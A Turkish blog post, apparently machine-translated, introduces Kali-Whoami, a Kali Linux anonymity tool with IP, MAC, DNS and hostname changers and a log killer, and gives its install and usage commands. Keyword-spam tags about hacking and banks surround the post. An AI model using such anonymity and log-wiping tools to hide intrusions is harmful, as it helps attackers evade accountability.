site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın

Kali-Whoami – Sizi Kali Linux’ta En Üst Düzeyde Anonim Tutmak İçin Geliştirilmiş Bir Gizlilik Aracı

Whoami aracının amacı, sizi Kali linux üzerinde mümkün olduğunca anonim kılar . Kullanım kolaylığı ve basit arayüzü ile kullanıcı dostudur . Mümkün olan en yüksek anonimlik seviyesini sağlamak için iki farklı yol izler.

Son olarak, internette asla yüzde yüz güvenlik olmadığını unutmayın!

Özellikler

  • anti mitm
  • Günlük katili
  • IP değiştirici
  • DNS değiştirici
  • Mac değiştirici
  • Anti soğuk çizme
  • saat dilimi değiştirici
  • ana bilgisayar adı değiştirici
  • Tarayıcı anonimleştirme

Başlarken

Sisteminizi düzenli olarak güncellemezseniz veya bu paketleri sisteminize yüklemediyseniz aracı kullanamazsınız. Öyleyse kurulumdan önce neye ihtiyacımız olduğunu ve nasıl indirebileceğimizi görelim.

  • Tüm bağımlılıkları aşağıdaki komutla indirebilir veya güncel olup olmadığını kontrol edebilirsiniz.tor curl python3 python3-scapy ağ yöneticisi “>sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager

Kurulum

  1. Depoyu klonlagit clone https://github.com/omer-dogan/kali-whoami
  2. makefile’ı yüklesudo make install

İşte bu kadar, artık aleti çalıştırmaya hazırsınız!
kullanım

Kurulumu tamamladıktan sonra, arama menüsüne “Kali Whoami” yazarak veya bir terminalde “sudo kali-whoami –help” yazarak uygulamayı çalıştırın.olası bir hata durumunda sistemi onarın. –help : Bu, menüyü gösterir. “>

[+] Usage : sudo kali-whoami [option]--start  :   It will make backups and start the program.--stop   :   Closes the program using a backup.--status :   Provides information about working status.--fix    :   Used to repair the system in case of a possible bug.--help   :   This shows the menu.

Demo

Kali-Whoami’yi indirin

2 Ekim 2022Cybersecurity a101, adana Demirspor, Akbank, ARDIŞIK, arızalı, ÇEKİRDEK, çeviri, ösym, üç kuruş, Barcelona, besiktas fb, Beşiktaş, bim, bjk, BİLGİ, Ciceksepeti, cuma mesajları, cumhuriyet, DÜZEN, Denizbank, e nabız, eba, ekşi, ekşi sözlük, ensonhaber, EXPLOİt, EXPLOİTATİON, EXPLOİT_MİTİGATİONS, F, fa, fac, facabook, face, facebok giriş, Facebook, facebook com, facebook giriş, facebook giriş yap, facebook hesap, facebook indir, facebook login, fanatik, fb, Fecebook, Fenerbahçe, fenerbahçe beko, Fesbuk, fesbuk giriş, Fotomaç aras kargo, Galatasaray, GÜNCEL, GÜVENLİKAÇIĞI, gratis, haber7, haberler, habertürk, hacker tools, hacking kit, hacking tools, Halkbank, hürriyet, hepsiburada, instagram, instagram giriş, iş bankası, işkur, karaca, kayseri hava durumu, Kelime, kit linux, Kocaelispor, Konyaspor, lcw, m facebook, maçkolik, manchester united, Marketplace, memurlar net, mersin hava durumu, meta, milliyet, mynet, n11, Nba, nesine, netflix, onedio, online pentest tools, pankek tarifi, pentest tools, psg, roblox, sahibinden, sözcü, sözcü gazetesi, sürat kargo, sürat kargo takip, silme, site hacking, sivasspor, tüvtürk, tools, tools for hacking, tools hack, Trabzonspor, Trendyol, twitch, twitter, website pentesting tools, WİNDOWS, WİNDOWSÇEKİRDEĞİ, yandex, yapı kredi, yotube, youtube, ziraat bankası, İPHONE, İZLEME Yorum yapın
WordPress.com'da bir web sitesi veya blog oluşturun Tema: WordPress.com tarafından Quadra.
  • Abone Ol Abone olunmuş
    • Cybersecurity Plus+ | Türkiye'nin en büyük teknoloji blogu
    • WordPress.com hesabınız var mı? Şimdi oturum açın.
    • Cybersecurity Plus+ | Türkiye'nin en büyük teknoloji blogu
    • Abone Ol Abone olunmuş
    • Kaydolun
    • Giriş
    • Bu içeriği rapor et
    • Siteyi Okuyucu'da görüntüle
    • Abonelikleri Yönet
    • Bu şeridi gizle
 

Yorumlar Yükleniyor...
 

Yorum yazabilmek için oturum açmalısınız.

    WordPress.com ile böyle bir site tasarlayın
    Başlayın